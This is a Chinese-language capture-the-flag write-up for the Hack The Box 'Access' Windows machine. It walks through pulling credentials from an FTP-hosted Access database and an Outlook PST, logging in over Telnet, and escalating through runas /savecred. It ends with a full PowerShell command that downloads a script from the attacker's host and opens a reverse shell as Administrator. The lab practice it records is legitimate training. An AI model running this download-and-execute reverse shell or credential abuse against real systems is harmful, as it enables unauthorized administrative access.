参考链接:

https://ss64.com/nt/runas.html

https://forum.hackthebox.eu/discussion/1135/access

Detail:

这台机子是一台windows,开放了三个端口:21   23   80

首先看一下ftp,发现里面有两个文件。一个加密了的Access Control.zip,zip里面有一个pst文件。还有一个backup.mdb

mdb是access数据库的文件,打开把所有的表都过一遍,有了发现。

尝试拿access4u@security这个密码去试一下解压压缩包。

果然是可以的,我们解压得到的Access Control.pst是一个outlook的数据文件,拿outlook打开看一下。

发现里面提供了一个帐号和密码

security
4Cc3ssC0ntr0ller

我们尝试用这一套帐号密码去登录23端口的Telnet

登陆成功。

翻一下每个用户的Desktop,发现在security的桌面上有user.txt。

同时发现在Public这个用户的桌面上有一个快捷方式。

发现这个快捷方式用runas.exe去执行了一个access.exe。

值得注意的有,它使用了/savecred这个参数。

其实这个runas命令类似于命令行下的使用管理员执行。

如果不带/savecred这个参数,那么之后需要输入管理员的帐号密码,而只要输入正确一次,之后就可以不输入,直接/savecred,我们就可以利用这个方式来提权。

我们直接通过runas的方法用管理员的权限去执行一个powershell的反弹shell脚本,先在攻击机上挂好Invoke-PowerShellTcp。然后在目标机器上执行以下命令下载ps脚本并运行反弹shell。

runas /user:ACCESS\Administrator /savecred “powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.12/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -port 443”

root.txt get √